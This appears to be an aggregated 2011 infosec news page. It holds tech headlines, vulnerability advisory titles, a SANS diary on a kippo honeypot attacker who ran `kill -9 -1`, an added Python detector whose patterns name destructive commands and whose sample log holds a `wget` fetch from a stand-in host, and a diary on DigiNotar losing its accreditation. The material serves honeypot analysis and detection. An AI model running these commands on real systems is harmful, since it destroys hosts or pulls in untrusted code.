InfoSec News

MasterCard on Thursday gave a sneak peek into the near future of mobile payment systems and said that the Google Wallet application is within weeks of being rolled out commercially.
A federal judge threw out a small part of Oracle's Java lawsuit against Google on Thursday but allowed the bulk of the case to proceed.
Smartphones can help make people healthier, according to three startups that stood out among young mobile companies presenting their ideas at the Demo Fall conference this week.
A mammoth army of infected computers is being assembled, but it's unclear yet what purpose they will be put to.
Microsoft will release a CTP (Community Technology Preview) of a new type of compiler its researchers have been building, code-named Project Roslyn, the company executive overseeing the C# programming language announced Thursday.
PlayBook shipments dropped in half for Research In Motion during its second quarter, which also saw revenue continue to plummet.
Microsoft's long-awaited deeper look at Windows 8 on Tuesday has piqued consumer interest, according to a company that scores online news and social media trends.
Facebook launched a new feature that lets you quickly group friends into lists to make sharing with certain people easier. Here are five important facts you should know before you get started.
"More work" needs to be done to establish Windows Phone in the marketplace, admitted Microsoft boss Steve Ballmer this week. And he promised Wall Street analysts that Microsoft was ready, willing, and able to do it.
PayPal has unveiled a mobile payment initiative for shoppers that doesn't require near-field communication (NFC) technology inside smartphones.
So you want to try out Windows 8. Excellent! But you're not foolhardy enough to use a developer preview build as your main work/play operating system--you just want to dabble. We'll show you how to download and install the Windows 8 developer preview onto a separate partition (or a separate hard drive, if you have a spare). If you don't feel like mucking up your hard drive with another partition, read How To Download and Install Windows 8 to a Virtual Machine for a less intrusive way to get Windows 8 up and running on your PC.
We've shown you how to go about installing the new Windows 8 developer preview on a brand-new hard drive or a partition of your existing hard drive--that's easy.
Intel hopes to redefine the PC market with a new category of thin and light laptops called ultrabooks, but at around $1,000, their hefty price tag leaves questions about the products' viability, attendees at the Intel Developer Forum conference said this week.
Intel on Thursday showed an experimental low-power processor the size of a postage stamp that could run PCs on solar power.
The potential of SAP's HANA in-memory computing engine permeated the agenda and had attendees' tongues wagging this week at the Tech Ed conference in Las Vegas, but the technology still has some maturing to do.
RETIRED: WordPress Event Registration 'event_id' Parameter SQL Injection Vulnerability
Event Registration Plugin for WordPress 'event_id' Parameter SQL Injection Vulnerability
Microsoft SharePoint XML Handling Remote File Disclosure Vulnerability
Google and representatives for authors and publishers told a U.S. District Court judge Thursday that they would like to continue discussions on a revised settlement in a copyright infringement case that has dragged on for years.
Amazon on Thursday said that many of its Web services now have a crucial certification that allows federal government agencies with strict security requirements to use the services.
Microsoft will not support browser plug-ins, including Adobe's Flash, in one of the two versions of Internet Explorer to be bundled with Windows 8, a company executive said today.
[Onapsis Security Advisory 2011-016] SAP WebAS Malicious SAP Shortcut Generation
[Onapsis Security Advisory 2011-014] SAP WebAS Remote Denial of Service
Microsoft's Binary Planting Clean-Up Mission
Apple confirmed on Thursday that it filed a lawsuit against Samsung in the U.K.'s High Court earlier in the week, as the two technology giants continue a legal tit-for-tat revolving around their mobile phone and tablet products.
The PCI Security Standards Council is expected to issue guidelines on use of point-to-point encryption in protecting sensitive payment card data, but the narrow approach — which is focused on hardware — is raising questions.
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit
CORE-2011-0506 - Multiples Vulnerabilities in ManageEngine ServiceDesk Plus
SAP WebAS Malicious SAP Shortcut Generation Remote Command Injection Vulnerability
XEE vulnerabilities in SharePoint (MS11-074) and DotNetNuke
Joyent is upgrading its public cloud service with better analytics and the ability to run Linux and Windows, as it hopes to persuade CIOs to move more applications to the company's cloud, it said on Thursday.
In business discussions around technology, it can be easy to get lost in the weeds. As IT departments and media try to forecast the next new wave of applications, the viability of one platform over another gets put into question, as does the hype cycle around emerging technologies. Society's tendency to focus on the micro trends puts the industry at risk of ignoring larger, more urgent technology issues. And at present, there is no technology discussion bigger than cloud computing.
Micron today released its first entry-level solid state drive to be used as a boot drive in servers or for I/O intensive read applications, such as video streaming in cloud computing environments.
[Onapsis Security Advisory 2011-015] SAP WebAS webrfc Cross-Site Scripting
ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products
Cisco Security Advisory: Cisco Unified Service Monitor and Cisco Unified Operations Manager Remote Code Execution Vulnerabilities
Cisco Security Advisory: CiscoWorks LAN Management Solution Remote Code Execution Vulnerabilities

Friends, Foes and Faceless Denizens – The Real Social Network
CSO (blog)

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
I had an interesting detect in one of my kippo honeypots last week. Kippo, if you are not familiar with it, is a script simulating an ssh server. It is typically configured to allow root logins with weak passwords and can be the source of never-ending entertainment as you watch confused script kiddies. The honeypot logs keystrokes and is able to replay them in real time.
In this particular case, the attacker logged in and issued the following commands:

kippo:~# w
06:37:29 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
root pts/0 06:37 0.00s 0.00s 0.00s w

kippo:~# ps x
5673 pts/0 00:00:00 bash
5677 pts/0 00:00:00 ps x

kippo:~# kill -9 -1

In short, the attacker went in, did minimal reconnaissance, and then went ahead and killed the system (terminating all processes with a PID larger than 1). A real system would be unresponsive as a result.

It is not clear if this is a vigilante/vandal killing badly configured ssh servers, or if this was an attempt to detect a honeypot (but then again, a real system would be dead as a result, and there are less destructive ways to detect simple honeypots like kippo).

The speed of the attack suggests that it was performed manually. We do not see a big change in ssh probes overall.

Any ideas? Has anybody seen similar vandals?
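One way to spot this kind of session in bulk rather than by replaying each one, as an added example that is not part of the diary or of kippo itself: group logged commands by session, flag sessions that ran a host-killing command such as the `kill -9 -1` above, and use the pauses between commands to separate a hands-on-keyboard vandal from a script. The "CMD:" log layout and the sample lines are constructed approximations, not real kippo output, and the 5-second manual/scripted threshold is an assumption.

```python
import re
from datetime import datetime

# Constructed sample lines in a kippo-like "CMD:" layout (an approximation of the
# honeypot's log, not real output): one manual vandal session, one scripted session.
SAMPLE_LOG = """\
2011-09-15 06:37:29+0000 [HoneyPotTransport,12,198.51.100.7] CMD: w
2011-09-15 06:37:41+0000 [HoneyPotTransport,12,198.51.100.7] CMD: ps x
2011-09-15 06:37:58+0000 [HoneyPotTransport,12,198.51.100.7] CMD: kill -9 -1
2011-09-15 07:02:10+0000 [HoneyPotTransport,13,203.0.113.9] CMD: uname -a
2011-09-15 07:02:10+0000 [HoneyPotTransport,13,203.0.113.9] CMD: cat /proc/cpuinfo
2011-09-15 07:02:11+0000 [HoneyPotTransport,13,203.0.113.9] CMD: wget http://example.invalid/x
"""

LINE_RE = re.compile(r"^(\S+ \S+) \[HoneyPotTransport,(\d+),([\d.]+)\] CMD: (.*)$")

# Commands that leave a real host unusable when run as root; "kill -9 -1" is the
# one from the diary (SIGKILL to every process the caller may signal).
DESTRUCTIVE = (
    re.compile(r"^kill\s+(-\w+\s+)?-1\b"),
    re.compile(r"^rm\s+-[a-zA-Z]*r[a-zA-Z]*\s+/(\s|$)"),
)

def parse_sessions(text):
    """Group (timestamp, command) pairs by (session id, source IP)."""
    sessions = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S%z")
        sessions.setdefault((m.group(2), m.group(3)), []).append((ts, m.group(4)))
    return sessions

def classify(cmds, manual_gap_seconds=5.0):
    """Return (destructive, looks_manual) for one session's ordered commands."""
    destructive = any(p.match(c) for _, c in cmds for p in DESTRUCTIVE)
    # A script fires commands back-to-back; a human pauses to read each output.
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(cmds, cmds[1:])]
    looks_manual = bool(gaps) and min(gaps) >= manual_gap_seconds
    return destructive, looks_manual

def find_vandals(text):
    """Map 'session@ip' to 'manual'/'scripted' for sessions that ran a destructive command."""
    verdicts = {}
    for (sid, ip), cmds in parse_sessions(text).items():
        destructive, manual = classify(cmds)
        if destructive:
            verdicts[f"{sid}@{ip}"] = "manual" if manual else "scripted"
    return verdicts
```

Running `find_vandals(SAMPLE_LOG)` flags only session 12, with 12 and 17 seconds between its three commands, as a manual destructive session; the back-to-back session 13 is neither.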

Linux Kernel CIFS Mount Local Denial of Service Vulnerability
OpenSSL ECDH Ciphersuites Remote Denial of Service Vulnerability
Worldwide semiconductor sales have slowed in 2011, and the market is on pace for a small decline compared to last year, market research company Gartner said on Thursday.
Dell plans to double the number of staff selling, marketing and developing the products of Force10 Networks, the networking company it acquired in August, an executive said.
With Windows Server 8, Microsoft has outdone itself, from a revamped UI to hundreds of new features, including vastly improved virtualization management.
Now that developers have in their hands a pre-release version of Windows 8 running on a special edition of the Samsung Series 7 tablet, analysts are weighing in on how many developers will ultimately build Windows tablet applications.
IT groups are starting to have a say in their companies' social media strategy moves and the decisions about social tools they deploy.
Intel's Thunderbolt high-speed interconnect technology, which shuffles data between PCs and devices like displays and external storage, could be years away from getting optical technology, an Intel executive said this week.

Posted by InfoSec News on Sep 15

By Jessica Derschowitz
CBS News
September 14, 2011

Scarlett Johansson is the latest celebrity wrapped up in a nude photo

The FBI is reportedly investigating the release of photos allegedly
hacked from the 26-year-old actress' cell phone.

"The FBI is aware of the alleged hacking incident and is looking into
it," an FBI official told Sources...

Posted by InfoSec News on Sep 15

CSO Online (Australia)
13 September, 2011

Talk about disconnect! Analysts, security engineers and other infosec
geeks aim for Swiss-watch precision, because one little mistake means
the bad guys win. We want people to take this seriously, right? So why
do certain marketing and PR departments spread a load of what my father,
a man more polite than...

Posted by InfoSec News on Sep 15

By Mathew J. Schwartz
September 14, 2011

The number-one advanced persistent threat (APT) attack vector is now not
technology, but social engineering. Furthermore, security is no longer
about trying to keep all intruders outside of the network perimeter, but
rather acknowledging that security today involves living in a state of
constant compromise.


Posted by InfoSec News on Sep 15

By Ulrik McKnight
The India Site
Sep 14, 2011

Since 2009 there has been repeated evidence of severe hacking of Indian
government and military organizations, industries, and even journalists’
email accounts. The evidence shows successful long-term cyber-attacks
and cyber-espionage, with strong indications that nation states are

The list of compromised Indian targets reads like a...

Posted by InfoSec News on Sep 15

By Bill Gertz
The Washington Times
September 13, 2011

The general in charge of U.S. cyberwarfare forces said Tuesday that
future computer-based combat likely will involve electronic strikes that
cause widespread power outages and even physical destruction of
thousand-ton machines.

Army Gen. Keith Alexander, commander of the new U.S. Cyber...
Next to being a provider of SSL certificates (which most browsers now distrust), DigiNotar also issued so-called qualified certificates. These are used to create digital signatures, and they are much more strictly regulated than the run-of-the-mill SSL and EV SSL certificates we all know from web servers and the like.
OPTA, the Dutch independent post and telecommunication authority (think of them as the regulator), has terminated [in Dutch] the accreditation of DigiNotar as a certificate provider on Sept 14th, 2011. This pertains to their qualified certificates.
It's probably best to give a very short introduction to what qualified certificates and accredited providers are and why this is so important.

The EU has issued guidelines (Directive 1999/93/EC) that have been translated into local law by member states such as the Netherlands and that establish the legal value of digital signatures. The legislators distinguish a number of levels of trust. Typically (local laws differ a bit sometimes, but they all implement the same concept) a digital signature is, by law, equivalent to a manual one. At the lowest level a digital signature can be as little as writing your name under an email, but everything remains to be proven in court afterwards. It gets more interesting on the higher levels: if the digital signature is proven to be a qualified digital signature, the equivalence to a manual signature is automatic (i.e. no discussion in court). But it still needs to be proven that the digital signature is in fact qualified. The ultimate level, however, is qualified digital signatures made with the means provided by an accredited provider. There the proof that the digital signature is qualified is automatic as well, as it is done up front (in the audits of the accredited providers).
From a more technical point of view, all of this is governed by the ETSI TS 101 456 standard, which sets the requirements.
Since the means provided by an accredited provider can be used to create digital signatures that are almost only disputable if one proves fraud, it is of critical importance to all of us (especially those living or doing business in the EU) that there are no rogue qualified certificates out there with our name on them, as they carry such a high legal weight.

OPTA reports a timeline that has been mostly public knowledge, except for their own actions and the interaction with DigiNotar and their auditors. The report concludes that DigiNotar was not only not acting in accordance with ETSI TS 101 456 on quite a few points, but was also breaking the relevant local laws.
OPTA also names PricewaterhouseCoopers as the (regular) auditors of DigiNotar, but does not go as far as to name them as the ones that gave the apparent clean bill of health on July 27th, 2011: "A number of servers were compromised. The hackers have obtained administrative rights to the outside webservers, the CA server Relaties-CA and also to Public-CA. Traces of hacker activity started on June 17th and ended on July 22nd." This was later dramatically proven to be untrue.
OPTA reports there are about 4200 qualified (signing) certificates issued by DigiNotar. The holders of these certificates will now have to be contacted by DigiNotar under supervision of OPTA, and they will have to seek another provider if they have not done so already.
The revocation of its status as an accredited provider also means that DigiNotar no longer meets the requirements for its PKIoverheid activities.

Swa Frantzen -- Section 66 (c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.